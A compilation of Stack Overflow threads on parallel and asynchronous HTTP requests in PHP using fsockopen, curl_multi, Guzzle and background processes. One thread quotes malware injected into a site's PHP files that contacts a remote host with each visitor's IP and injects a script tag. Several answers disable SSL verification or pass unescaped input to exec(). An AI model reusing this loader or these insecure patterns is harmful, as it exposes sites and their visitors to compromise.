Running several PHP processes in parallel - php

We're working on a SEO related script in PHP, and we need to run different modules (each one of them are a file .php) at the same time once we finish with the crawling process. In other words, we need to execute more than 10 .php files, in parallel.
The application used to work with a sequence, so once when one script was ending, the user's browser was forwarded into the next one. Each one of the scripts is establishing a connection to the database, and sending different HTTP packets to the crawled web application.
I understand that this could be approached using popen? Is there any way to receive information from each one of this modules into the main script that triggers them? Could anyone provide a very short snippet to see how this would work?

try this technique for running multiple parallel jobs in PHP. In this example, we have two job files: j1.php and j2.php we want to run. The sample jobs don't do anything fancy. The file j1.php looks like this:
$jobname = 'j1';
set_time_limit(0);
$secs = 60;
while ($secs) {
echo $jobname,'::',$secs,"\n";
flush(); #ob_flush(); ## make sure that all output is sent in real-time
$secs -= 1;
$t = time();
sleep(1); // pause
}
The reason why we flush(); #ob_flush(); is that when we echo or print, the strings are sometimes buffered by PHP and not sent until later. These two functions ensure that all data is sent immediately.
We then have a 3rd file, control.php, which does the coordination of jobs j1 and j2. This script will call j1.php and j2.php asynchronously using fsockopen in JobStartAsync(), so we are able to run j1.php and j2.php in parallel. The output from j1.php and j2.php are returned to control.php using JobPollAsync().
#
# control.php
#
function JobStartAsync($server, $url, $port=80,$conn_timeout=30, $rw_timeout=86400)
{
$errno = '';
$errstr = '';
set_time_limit(0);
$fp = fsockopen($server, $port, $errno, $errstr, $conn_timeout);
if (!$fp) {
echo "$errstr ($errno)<br />\n";
return false;
}
$out = "GET $url HTTP/1.1\r\n";
$out .= "Host: $server\r\n";
$out .= "Connection: Close\r\n\r\n";
stream_set_blocking($fp, false);
stream_set_timeout($fp, $rw_timeout);
fwrite($fp, $out);
return $fp;
}
// returns false if HTTP disconnect (EOF), or a string (could be empty string) if still connected
function JobPollAsync(&$fp)
{
if ($fp === false) return false;
if (feof($fp)) {
fclose($fp);
$fp = false;
return false;
}
return fread($fp, 10000);
}
###########################################################################################
if (1) { /* SAMPLE USAGE BELOW */
$fp1 = JobStartAsync('localhost','/jobs/j1.php');
$fp2 = JobStartAsync('localhost','/jobs/j2.php');
while (true) {
sleep(1);
$r1 = JobPollAsync($fp1);
$r2 = JobPollAsync($fp2);
if ($r1 === false && $r2 === false) break;
echo "<b>r1 = </b>$r1<br>";
echo "<b>r2 = </b>$r2<hr>";
flush(); #ob_flush();
}
echo "<h3>Jobs Complete</h3>";
}
Good Read
Divide-and-conquer and parallel processing in PHP
from the source

If the various files in PHP have no dependency, I think you can use a multi-curl approach which can be implemented as shown :-
$linkArray = array('file1.php', 'file2.php','file3.php','file4.php','file5.php');
$nodes = ($linkArray);
$node_count = count($nodes);
$curl_arr = array();
$master = curl_multi_init();
$counter = 0;
for($i = 0; $i < $node_count; $i++)
{
$url =$nodes[$i];
$curl_arr[$i] = curl_init($url);
curl_setopt($curl_arr[$i], CURLOPT_RETURNTRANSFER, true);
curl_multi_add_handle($master, $curl_arr[$i]);
}
do {
curl_multi_exec($master,$running);
} while($running > 0);
for($k=0;$k<$node_count;$k++){
$result = curl_multi_getcontent ($curl_arr[$k]); // contains the output of individual files
}

Related

Read to the end of an XML response when the server isn't specifying the end of file?

I'm writing a script that communicates with a server via XML. I can tell I'm making successful requests to the server's API because I can see in a log on the server it's receiving them, however I'm having a hard time receiving the response (XML). I do not own the server and unfortunately cannot modify any of the programs sending the response.
I don't think the server is specifying the end of the file, so doing a while (!feof($fp)) { ... } hangs. And unfortunately I don't think I have any way (to my knowledge) of determining the size of the response before reading it.
What I am doing and what I have attempted:
function postXMLSocket ($server, $path, $port, $xmlDocument) {
$contentLength = strlen($xmlDocument);
$result = '';
// Handling error case in else statement below
if ($fp = #fsockopen($server, $port, $errno, $errstr, 30)) {
$out = "POST / HTTP/1.0\r\n";
$out .= "Host: ".$server."\r\n";
$out .= "Content-Type: text/xml\r\n";
$out .= "Content-Length: ".$contentLength."\r\n";
$out .= "Connection: close\r\n";
$out .= "\r\n"; // all headers sent
$out .= $xmlDocument;
fwrite($fp, $out);
// ATTEMPT 5: Read until we have a valid XML doc -- hangs
// libxml_use_internal_errors(true);
// do {
// $result .= fgets($fp, 128);
// $xmlTest = simplexml_load_string($result);
// } while ($xmlTest === false);
// ATTEMPT 4: Read X # of lines -- works but I can't know how many lines response will be
// for ($i = 0; $i < 10; $i++) {
// $result .= fgets($fp, 128);
// }
// ATTEMPT 3: Read until the lines being read are empty -- hangs
// do {
// $lineRead = fgets($fp, 500);
// $result .= $lineRead;
// } while (strlen($lineRead) > 0);
// ATTEMPT 2: Read the whole file w/ fread -- only reads part of file
// $result = fread($fp, 8192);
// ATTEMPT 1: Read to the EOF -- hangs
// while (!feof($fp)) {
// $result .= fgets($fp, 128);
// }
fclose($fp);
}
else {
// Could not connect to socket
return false;
}
return $result;
}
Attempt descriptions:
1) First I just tried reading lines until reaching the end of the file. This keeps hanging and resulting in a time out and I think it's because the server isn't marking the end of the XML file it's responding with, so it's getting caught in an infinite loop.
2) Second I tried to read response as one whole file. This worked and I got something back, but it was incomplete (seems the response is quite large). While this works, I don't have any way of knowing how big the response will be before reading it, so I don't think this is an option.
3) Next I tried reading until fgets is returning an empty string. I made the assumption it would do this if it's reading lines after passing the end of the file, but this hangs as well.
4) For this attempt I just tried to read a hardcoded number of lines (10 in this case), but this has similar problems to attempt 2 above where I can't accurately know how many lines the response will have until after reading it.
5) This is where I thought I was getting clever. I know the response will be XML, and will be contained in a <Response> node. Therefore I thought I could get away with reading until the $result variable contained a valid XML string, however this seems to hang as well.
Using a higher level approach to HTTP requests will probably help you. Try this:
$stringWithSomeXml = "your payload xml here";
postXml("www.google.com", "/path/on/server", 80, $stringWithSomeXml);
function postXml($server, $path, $port, $xmlPayload)
{
$ch = curl_init();
$path = ltrim($path, "/");
if ($port == 80) {
$url = "https://{$server}/{$path}";
} else {
$url = "https://{$server}:{$port}/{$path}";
}
echo "\n$url\n";
curl_setopt(
$ch,
CURLOPT_URL,
$url
);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt(
$ch,
CURLOPT_HTTPHEADER,
[
"Content-type: application/xml",
"Content-Length: ".strlen($xmlPayload)
]
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $xmlPayload);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$result = curl_exec($ch);
echo "length: " . strlen($result) . "\n";
echo "content: " . $result . "\n";
curl_close($ch);
}

Malicious PHP code injected into a PHP file

Last week we had a problem on our server where code was injected into PHP files. I was wondering what the cause of this could have been. The code snippet that has been injected into our files looked something like this.
#be7339#
if (empty($qjqb))
{
error_reporting(0);
#ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
{
function __url_get_contents($remote_url, $timeout)
{
if(function_exists('curl_exec'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
}
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
{
$ctx = #stream_context_create(array('http' =>array('timeout' => $timeout,)));
$_url_get_contents_data = #file_get_contents($remote_url, false, $ctx);
} elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
$handle = #fopen($remote_url, "r");
$_url_get_contents_data = #stream_get_contents($handle);
} else {
$_url_get_contents_data = __file_get_url_contents($remote_url);
}
return $_url_get_contents_data;
}
}
if (!function_exists('__file_get_url_contents'))
{
function __file_get_url_contents($remote_url)
{
if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches))
{
$protocol = strtolower($matches[1]);
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return FALSE;
}
if ($protocol == "http")
{
$socket = #fsockopen($host, 80, $errno, $errstr, $timeout);
} else
{
// Bad protocol
return FALSE;
}
if (!$socket)
{
// Error creating socket
return FALSE;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = #fwrite($socket, $request);
if ($len_written === FALSE || $len_written != strlen($request))
{
// Error sending request
return FALSE;
}
$response = "";
while (!#feof($socket) &&
($buf = #fread($socket, 4096)) !== FALSE) {
$response .= $buf;
}
if ($buf === FALSE) {
// Error reading response
return FALSE;
}
$end_of_header = strpos($response, "\r\n\r\n");
return substr($response, $end_of_header + 4);
}
}
if (empty($__var_to_echo) && empty($remote_domain))
{
$_ip = $_SERVER['REMOTE_ADDR'];
$qjqb = "http://pleasedestroythis.net/L3xmqGtN.php";
$qjqb = __url_get_contents($qjqb."?a=$_ip", 1);
if (strpos($qjqb, 'http://') === 0)
{
$__var_to_echo = '<script type="text/javascript" src="' . $qjqb . '?id=13028308"></script>';
echo $__var_to_echo;
}
}
}
I would like to ask how this could have happened. And how to prevent this in the future.
Thanks in advance.
Script (PHP) code injection usually means that someone has gotten hold of the password(s) to your hosting account. At the very minimum scan your PCs for spyware and viruses, and then change your passwords. Use SSL when connecting to your hosting account control panel, if possible. Be careful about using FTP, as it sends passwords in the clear. See if your host supports a more secure file transfer method.
The most common way this happens is you probably have a script that allows files uploads. Then if the script is not validating what file is uploaded a malicious user could upload a php file.
If your upload folder allows parsing of PHP files the user could run that PHP file in the browser, it could be some sort of file explorer which will then show the user all the files on your server. Now if any files have the right permissions the user could easily edit the file to include the extra code you are seeing.
Usually it's because somebody else got access to your FTP or you allow uploading PHP files.
You should look into other files, because there could be another code, that keeps adding those lines to your code (just guess because of "#be7339#" at the beginning.
What is the Apache version on your server ? This problem can come from using an outdated version..
Look at this link about security breaches on old versions Apache:
http://httpd.apache.org/security/vulnerabilities_20.html

How to reduce virtual memory by optimising my PHP code?

My current code (see below) uses 147MB of virtual memory!
My provider has allocated 100MB by default and the process is killed once run, causing an internal error.
The code is utilising curl multi and must be able to loop with more than 150 iterations whilst still minimizing the virtual memory. The code below is only set at 150 iterations and still causes the internal server error. At 90 iterations the issue does not occur.
How can I adjust my code to lower the resource use / virtual memory?
Thanks!
<?php
function udate($format, $utimestamp = null) {
if ($utimestamp === null)
$utimestamp = microtime(true);
$timestamp = floor($utimestamp);
$milliseconds = round(($utimestamp - $timestamp) * 1000);
return date(preg_replace('`(?<!\\\\)u`', $milliseconds, $format), $timestamp);
}
$url = 'https://www.testdomain.com/';
$curl_arr = array();
$master = curl_multi_init();
for($i=0; $i<150; $i++)
{
$curl_arr[$i] = curl_init();
curl_setopt($curl_arr[$i], CURLOPT_URL, $url);
curl_setopt($curl_arr[$i], CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl_arr[$i], CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl_arr[$i], CURLOPT_SSL_VERIFYPEER, FALSE);
curl_multi_add_handle($master, $curl_arr[$i]);
}
do {
curl_multi_exec($master,$running);
} while($running > 0);
for($i=0; $i<150; $i++)
{
$results = curl_multi_getcontent ($curl_arr[$i]);
$results = explode("<br>", $results);
echo $results[0];
echo "<br>";
echo $results[1];
echo "<br>";
echo udate('H:i:s:u');
echo "<br><br>";
usleep(100000);
}
?>
As per your last comment..
Download RollingCurl.php.
Hopefully this will sufficiently spam the living daylights out of your API.
<?php
$url = '________';
$fetch_count = 150;
$window_size = 5;
require("RollingCurl.php");
function request_callback($response, $info, $request) {
list($result0, $result1) = explode("<br>", $response);
echo "{$result0}<br>{$result1}<br>";
//print_r($info);
//print_r($request);
echo "<hr>";
}
$urls = array_fill(0, $fetch_count, $url);
$rc = new RollingCurl("request_callback");
$rc->window_size = $window_size;
foreach ($urls as $url) {
$request = new RollingCurlRequest($url);
$rc->add($request);
}
$rc->execute();
?>
Looking through your questions, I saw this comment:
If the intention is domain snatching,
then using one of the established
services is a better option. Your
script implementation is hardly as
important as the actual connection and
latency.
I agree with that comment.
Also, you seem to have posted the "same question" approximately seven hundred times:
https://stackoverflow.com/users/558865/icer
https://stackoverflow.com/users/516277/icer
How can I adjust the server to run my PHP script quicker?
How can I re-code my php script to run as quickly as possible?
How to run cURL once, checking domain availability in a loop? Help fixing code please
Help fixing php/api/curl code please
How to reduce virtual memory by optimising my PHP code?
Overlapping HTTPS requests?
Multiple https requests.. how to?
Doesn't the fact that you have to keep asking the same question over and over tell you that you're doing it wrong?
This comment of yours:
#mario: Cheers. I'm competing against
2 other companies for specific
ccTLD's. They are new to the game and
they are snapping up those domains in
slow time (up to 10 seconds after
purge time). I'm just a little slower
at the moment.
I'm fairly sure that PHP on a shared hosting account is the wrong tool to use if you are seriously trying to beat two companies at snapping up expired domain names.
The result of each of the 150 queries is being stored in PHP memory and by your evidence this is insufficient. The only conclusion is that you cannot keep 150 queries in memory. You must have a method of streaming to files instead of memory buffers, or simply reduce the number of queries and processing the list of URLs in batches.
To use streams you must set CURLOPT_RETURNTRANSFER to 0 and implement a callback for CURLOPT_WRITEFUNCTION, there is an example in the PHP manual:
http://www.php.net/manual/en/function.curl-setopt.php#98491
function on_curl_write($ch, $data)
{
global $fh;
$bytes = fwrite ($fh, $data, strlen($data));
return $bytes;
}
curl_setopt ($curl_arr[$i], CURLOPT_WRITEFUNCTION, 'on_curl_write');
Getting the correct file handle in the callback is left as problem for the reader to solve.
<?php
echo str_repeat(' ', 1024); //to make flush work
$url = 'http://__________/';
$fetch_count = 15;
$delay = 100000; //0.1 second
//$delay = 1000000; //1 second
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
for ($i=0; $i<$fetch_count; $i++) {
$start = microtime(true);
$result = curl_exec($ch);
list($result0, $result1) = explode("<br>", $result);
echo "{$result0}<br>{$result1}<br>";
flush();
$end = microtime(true);
$sleeping = $delay - ($end - $start);
echo 'sleeping: ' . ($sleeping / 1000000) . ' seconds<hr />';
usleep($sleeping);
}
curl_close($ch);
?>

PHP - Downloading very large files with fsockopen(), fgets() and feof()

I have a simple download function in a class that might be dealing with files of many hundreds of megabytes at a time from an Amazon Web Services bucket. The whole file cannot be loaded into memory at once, so it must be streamed directly to a file pointer. This is my understanding as this is the first time I've dealt with this issue and I'm picking things up as I go along.
I've ended up with this, based on a 4 KB file buffer which simple testing showed was a good size:
$fs = fsockopen($host, 80, $errno, $errstr, 30);
if (!$fs) {
$this->writeDebugInfo("FAILED ", $errstr . '(' . $errno . ')');
} else {
$out = "GET $file HTTP/1.1\r\n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fs, $out);
$fm = fopen ($temp_file_name, "w");
stream_set_timeout($fs, 30);
while(!feof($fs) && ($debug = fgets($fs)) != "\r\n" ); // ignore headers
while(!feof($fs)) {
$contents = fgets($fs, 4096);
fwrite($fm, $contents);
$info = stream_get_meta_data($fs);
if ($info['timed_out']) {
break;
}
}
fclose($fm);
fclose($fs);
if ($info['timed_out']) {
// Delete temp file if fails
unlink($temp_file_name);
$this->writeDebugInfo("FAILED - Connection timed out: ", $temp_file_name);
} else {
// Move temp file if succeeds
$media_file_name = str_replace('temp/', 'media/', $temp_file_name);
rename($temp_file_name, $media_file_name);
$this->writeDebugInfo("SUCCESS: ", $media_file_name);
}
}
In testing it's fine. However I have got into a conversation with someone who is saying that I am not understanding how fgets() and feof() work together, and he's mentioning chunked encoding as a more efficient method.
Is the code generally OK, or am I missing something vital here? What is the benefit that chunked encoding will give me?
Your solution seems fine to me, however I have a few comments.
1) Don't create a HTTP packet yourself, i.e. don't send the HTTP request. Instead use something like CURL. This is more fool proof and will support a wider range of responses the server might reply with. Additionally CURL can be setup to write directly to a file, saving you doing it yourself.
2) Using fgets may be a problem if you are reading binary data. Fgets reads to the end of a line, and with binary data this may corrupt your download. Instead I suggest fread($fs, 4096); which will handle both text and binary data.
2) Chunked encoding is a way for a webserver to send you the response in multiple chunks. I don't think this is very useful to you, however, a better encoding that the webserver might support is the gzip encoding. This would allow the webserver to compress the response on the fly. If you use a library like CURL, it will tell the server it supports gzip, and then automatically decompress it for you.
I hope this helps
Don't deal with sockets, optimize your code and use the cURL library, PHP cURL. Like this:
$url = 'http://'.$host.'/'.$file;
// create a new cURL resource
$fh = fopen ($temp_file_name, "w");
$ch = curl_init();
// set URL and other appropriate options
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FILE, $fh);
//curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// grab URL and pass it to the browser
curl_exec($ch);
// close cURL resource, and free up system resources
curl_close($ch);
fclose($fh);
And the final result in case it helps anyone else. I also wrapped the whole thing in a retry loop to decrease the risk of a completely failed download, but it does increase the use of resources:
do {
$fs = fopen('http://' . $host . $file, "rb");
if (!$fs) {
$this->writeDebugInfo("FAILED ", $errstr . '(' . $errno . ')');
} else {
$fm = fopen ($temp_file_name, "w");
stream_set_timeout($fs, 30);
while(!feof($fs)) {
$contents = fread($fs, 4096); // Buffered download
fwrite($fm, $contents);
$info = stream_get_meta_data($fs);
if ($info['timed_out']) {
break;
}
}
fclose($fm);
fclose($fs);
if ($info['timed_out']) {
// Delete temp file if fails
unlink($temp_file_name);
$this->writeDebugInfo("FAILED on attempt " . $download_attempt . " - Connection timed out: ", $temp_file_name);
$download_attempt++;
if ($download_attempt < 5) {
$this->writeDebugInfo("RETRYING: ", $temp_file_name);
}
} else {
// Move temp file if succeeds
$media_file_name = str_replace('temp/', 'media/', $temp_file_name);
rename($temp_file_name, $media_file_name);
$this->newDownload = true;
$this->writeDebugInfo("SUCCESS: ", $media_file_name);
}
}
} while ($download_attempt < 5 && $info['timed_out']);

How do I make an asynchronous GET request in PHP?

I wish to make a simple GET request to another script on a different server. How do I do this?
In one case, I just need to request an external script without the need for any output.
make_request('http://www.externalsite.com/script1.php?variable=45'); //example usage
In the second case, I need to get the text output.
$output = make_request('http://www.externalsite.com/script2.php?variable=45');
echo $output; //string output
To be honest, I do not want to mess around with CURL as this isn't really the job of CURL. I also do not want to make use of http_get as I do not have the PECL extensions.
Would fsockopen work? If so, how do I do this without reading in the contents of the file? Is there no other way?
Thanks all
Update
I should of added, in the first case, I do not want to wait for the script to return anything. As I understand file_get_contents() will wait for the page to load fully etc?
file_get_contents will do what you want
$output = file_get_contents('http://www.example.com/');
echo $output;
Edit: One way to fire off a GET request and return immediately.
Quoted from http://petewarden.typepad.com/searchbrowser/2008/06/how-to-post-an.html
function curl_post_async($url, $params)
{
foreach ($params as $key => &$val) {
if (is_array($val)) $val = implode(',', $val);
$post_params[] = $key.'='.urlencode($val);
}
$post_string = implode('&', $post_params);
$parts=parse_url($url);
$fp = fsockopen($parts['host'],
isset($parts['port'])?$parts['port']:80,
$errno, $errstr, 30);
$out = "POST ".$parts['path']." HTTP/1.1\r\n";
$out.= "Host: ".$parts['host']."\r\n";
$out.= "Content-Type: application/x-www-form-urlencoded\r\n";
$out.= "Content-Length: ".strlen($post_string)."\r\n";
$out.= "Connection: Close\r\n\r\n";
if (isset($post_string)) $out.= $post_string;
fwrite($fp, $out);
fclose($fp);
}
What this does is open a socket, fire off a get request, and immediately close the socket and return.
This is how to make Marquis' answer work with both POST and GET requests:
// $type must equal 'GET' or 'POST'
function curl_request_async($url, $params, $type='POST')
{
foreach ($params as $key => &$val) {
if (is_array($val)) $val = implode(',', $val);
$post_params[] = $key.'='.urlencode($val);
}
$post_string = implode('&', $post_params);
$parts=parse_url($url);
$fp = fsockopen($parts['host'],
isset($parts['port'])?$parts['port']:80,
$errno, $errstr, 30);
// Data goes in the path for a GET request
if('GET' == $type) $parts['path'] .= '?'.$post_string;
$out = "$type ".$parts['path']." HTTP/1.1\r\n";
$out.= "Host: ".$parts['host']."\r\n";
$out.= "Content-Type: application/x-www-form-urlencoded\r\n";
$out.= "Content-Length: ".strlen($post_string)."\r\n";
$out.= "Connection: Close\r\n\r\n";
// Data goes in the request body for a POST request
if ('POST' == $type && isset($post_string)) $out.= $post_string;
fwrite($fp, $out);
fclose($fp);
}
Regarding your update, about not wanting to wait for the full page to load - I think a HTTP HEAD request is what you're looking for..
get_headers should do this - I think it only requests the headers, so will not be sent the full page content.
"PHP / Curl: HEAD Request takes a long time on some sites" describes how to do a HEAD request using PHP/Curl
If you want to trigger the request, and not hold up the script at all, there are a few ways, of varying complexities..
Execute the HTTP request as a background process, php execute a background process - basically you would execute something like "wget -O /dev/null $carefully_escaped_url" - this will be platform specific, and you have to be really careful about escaping parameters to the command
Executing a PHP script in the background - basically the same as the UNIX process method, but executing a PHP script rather than a shell command
Have a "job queue", using a database (or something like beanstalkd which is likely overkill). You add a URL to the queue, and a background process or cron-job routinely checks for new jobs and performs requests on the URL
You don't. While PHP offers lots of ways to call a URL, it doesn't offer out of the box support for doing any kind of asynchronous/threaded processing per request/execution cycle. Any method of sending a request for a URL (or a SQL statement, or a etc.) is going to wait for some kind of response. You'll need some kind of secondary system running on the local machine to achieve this (google around for "php job queue")
I would recommend you well tested PHP library: curl-easy
<?php
$request = new cURL\Request('http://www.externalsite.com/script2.php?variable=45');
$request->getOptions()
->set(CURLOPT_TIMEOUT, 5)
->set(CURLOPT_RETURNTRANSFER, true);
// add callback when the request will be completed
$request->addListener('complete', function (cURL\Event $event) {
$response = $event->response;
$content = $response->getContent();
echo $content;
});
while ($request->socketPerform()) {
// do anything else when the request is processed
}
function make_request($url, $waitResult=true){
$cmi = curl_multi_init();
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_multi_add_handle($cmi, $curl);
$running = null;
do {
curl_multi_exec($cmi, $running);
sleep(.1);
if(!$waitResult)
break;
} while ($running > 0);
curl_multi_remove_handle($cmi, $curl);
if($waitResult){
$curlInfos = curl_getinfo($curl);
if((int) $curlInfos['http_code'] == 200){
curl_multi_close($cmi);
return curl_multi_getcontent($curl);
}
}
curl_multi_close($cmi);
}
If you are using Linux environment then you can use the PHP's exec command to invoke the linux curl. Here is a sample code, which will make a Asynchronous HTTP post.
function _async_http_post($url, $json_string) {
$run = "curl -X POST -H 'Content-Type: application/json'";
$run.= " -d '" .$json_string. "' " . "'" . $url . "'";
$run.= " > /dev/null 2>&1 &";
exec($run, $output, $exit);
return $exit == 0;
}
This code does not need any extra PHP libs and it can complete the http post in less than 10 milliseconds.
Interesting problem. I'm guessing you just want to trigger some process or action on the other server, but don't care what the results are and want your script to continue. There is probably something in cURL that can make this happen, but you may want to consider using exec() to run another script on the server that does the call if cURL can't do it. (Typically people want the results of the script call so I'm not sure if PHP has the ability to just trigger the process.) With exec() you could run a wget or even another PHP script that makes the request with file_get_conents().
Nobody seems to mention Guzzle, which is a PHP HTTP client that makes it easy to send HTTP requests. It can work with or without Curl. It can send both synchronous and asynchronous requests.
$client = new GuzzleHttp\Client();
$promise = $client->requestAsync('GET', 'http://httpbin.org/get');
$promise->then(
function (ResponseInterface $res) {
echo $res->getStatusCode() . "\n";
},
function (RequestException $e) {
echo $e->getMessage() . "\n";
echo $e->getRequest()->getMethod();
}
);
You'd better consider using Message Queues instead of advised methods.
I'm sure this will be better solution, although it requires a little more job than just sending a request.
let me show you my way :)
needs nodejs installed on the server
(my server sends 1000 https get request takes only 2 seconds)
url.php :
<?
$urls = array_fill(0, 100, 'http://google.com/blank.html');
function execinbackground($cmd) {
if (substr(php_uname(), 0, 7) == "Windows"){
pclose(popen("start /B ". $cmd, "r"));
}
else {
exec($cmd . " > /dev/null &");
}
}
fwite(fopen("urls.txt","w"),implode("\n",$urls);
execinbackground("nodejs urlscript.js urls.txt");
// { do your work while get requests being executed.. }
?>
urlscript.js >
var https = require('https');
var url = require('url');
var http = require('http');
var fs = require('fs');
var dosya = process.argv[2];
var logdosya = 'log.txt';
var count=0;
http.globalAgent.maxSockets = 300;
https.globalAgent.maxSockets = 300;
setTimeout(timeout,100000); // maximum execution time (in ms)
function trim(string) {
return string.replace(/^\s*|\s*$/g, '')
}
fs.readFile(process.argv[2], 'utf8', function (err, data) {
if (err) {
throw err;
}
parcala(data);
});
function parcala(data) {
var data = data.split("\n");
count=''+data.length+'-'+data[1];
data.forEach(function (d) {
req(trim(d));
});
/*
fs.unlink(dosya, function d() {
console.log('<%s> file deleted', dosya);
});
*/
}
function req(link) {
var linkinfo = url.parse(link);
if (linkinfo.protocol == 'https:') {
var options = {
host: linkinfo.host,
port: 443,
path: linkinfo.path,
method: 'GET'
};
https.get(options, function(res) {res.on('data', function(d) {});}).on('error', function(e) {console.error(e);});
} else {
var options = {
host: linkinfo.host,
port: 80,
path: linkinfo.path,
method: 'GET'
};
http.get(options, function(res) {res.on('data', function(d) {});}).on('error', function(e) {console.error(e);});
}
}
process.on('exit', onExit);
function onExit() {
log();
}
function timeout()
{
console.log("i am too far gone");process.exit();
}
function log()
{
var fd = fs.openSync(logdosya, 'a+');
fs.writeSync(fd, dosya + '-'+count+'\n');
fs.closeSync(fd);
}
For me the question about asynchronous GET request is appeared because of I met with situation when I need to do hundreds of requests, get and deal with result data on every request and every request takes significant milliseconds of executing that leads to minutes(!) of total executing with simple file_get_contents.
In this case it was very helpful comment of w_haigh at php.net on function http://php.net/manual/en/function.curl-multi-init.php
So, here is my upgraded and cleaned version of making lot of requests simultaneously.
For my case it's equivalent to "asynchronous" way. May be it helps for someone!
// Build the multi-curl handle, adding both $ch
$mh = curl_multi_init();
// Build the individual requests, but do not execute them
$chs = [];
$chs['ID0001'] = curl_init('http://webservice.example.com/?method=say&word=Hello');
$chs['ID0002'] = curl_init('http://webservice.example.com/?method=say&word=World');
// $chs[] = ...
foreach ($chs as $ch) {
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true, // Return requested content as string
CURLOPT_HEADER => false, // Don't save returned headers to result
CURLOPT_CONNECTTIMEOUT => 10, // Max seconds wait for connect
CURLOPT_TIMEOUT => 20, // Max seconds on all of request
CURLOPT_USERAGENT => 'Robot YetAnotherRobo 1.0',
]);
// Well, with a little more of code you can use POST queries too
// Also, useful options above can be CURLOPT_SSL_VERIFYHOST => 0
// and CURLOPT_SSL_VERIFYPEER => false ...
// Add every $ch to the multi-curl handle
curl_multi_add_handle($mh, $ch);
}
// Execute all of queries simultaneously, and continue when ALL OF THEM are complete
$running = null;
do {
curl_multi_exec($mh, $running);
} while ($running);
// Close the handles
foreach ($chs as $ch) {
curl_multi_remove_handle($mh, $ch);
}
curl_multi_close($mh);
// All of our requests are done, we can now access the results
// With a help of ids we can understand what response was given
// on every concrete our request
$responses = [];
foreach ($chs as $id => $ch) {
$responses[$id] = curl_multi_getcontent($ch);
curl_close($ch);
}
unset($chs); // Finita, no more need any curls :-)
print_r($responses); // output results
It's easy to rewrite this to handle POST or other types of HTTP(S) requests or any combinations of them. And Cookie support, redirects, http-auth, etc.
Try:
//Your Code here
$pid = pcntl_fork();
if ($pid == -1) {
die('could not fork');
}
else if ($pid)
{
echo("Bye")
}
else
{
//Do Post Processing
}
This will NOT work as an apache module, you need to be using CGI.
I found this interesting link to do asynchronous processing(get request).
askapache
Furthermore you could do asynchronous processing by using a message queue like for instance beanstalkd.
Here's an adaptation of the accepted answer for performing a simple GET request.
One thing to note if the server does any url rewriting, this will not work. You'll need to use a more full featured http client.
/**
* Performs an async get request (doesn't wait for response)
* Note: One limitation of this approach is it will not work if server does any URL rewriting
*/
function async_get($url)
{
$parts=parse_url($url);
$fp = fsockopen($parts['host'],
isset($parts['port'])?$parts['port']:80,
$errno, $errstr, 30);
$out = "GET ".$parts['path']." HTTP/1.1\r\n";
$out.= "Host: ".$parts['host']."\r\n";
$out.= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
fclose($fp);
}
Just a few corrections on scripts posted above. The following is working for me
function curl_request_async($url, $params, $type='GET')
{
$post_params = array();
foreach ($params as $key => &$val) {
if (is_array($val)) $val = implode(',', $val);
$post_params[] = $key.'='.urlencode($val);
}
$post_string = implode('&', $post_params);
$parts=parse_url($url);
echo print_r($parts, TRUE);
$fp = fsockopen($parts['host'],
(isset($parts['scheme']) && $parts['scheme'] == 'https')? 443 : 80,
$errno, $errstr, 30);
$out = "$type ".$parts['path'] . (isset($parts['query']) ? '?'.$parts['query'] : '') ." HTTP/1.1\r\n";
$out.= "Host: ".$parts['host']."\r\n";
$out.= "Content-Type: application/x-www-form-urlencoded\r\n";
$out.= "Content-Length: ".strlen($post_string)."\r\n";
$out.= "Connection: Close\r\n\r\n";
// Data goes in the request body for a POST request
if ('POST' == $type && isset($post_string)) $out.= $post_string;
fwrite($fp, $out);
fclose($fp);
}
Based on this thread I made this for my codeigniter project. It works just fine. You can have any function processed in the background.
A controller that accepts the async calls.
class Daemon extends CI_Controller
{
// Remember to disable CI's csrf-checks for this controller
function index( )
{
ignore_user_abort( 1 );
try
{
if ( strcmp( $_SERVER['REMOTE_ADDR'], $_SERVER['SERVER_ADDR'] ) != 0 && !in_array( $_SERVER['REMOTE_ADDR'], $this->config->item( 'proxy_ips' ) ) )
{
log_message( "error", "Daemon called from untrusted IP-address: " . $_SERVER['REMOTE_ADDR'] );
show_404( '/daemon' );
return;
}
$this->load->library( 'encrypt' );
$params = unserialize( urldecode( $this->encrypt->decode( $_POST['data'] ) ) );
unset( $_POST );
$model = array_shift( $params );
$method = array_shift( $params );
$this->load->model( $model );
if ( call_user_func_array( array( $this->$model, $method ), $params ) === FALSE )
{
log_message( "error", "Daemon could not call: " . $model . "::" . $method . "()" );
}
}
catch(Exception $e)
{
log_message( "error", "Daemon has error: " . $e->getMessage( ) . $e->getFile( ) . $e->getLine( ) );
}
}
}
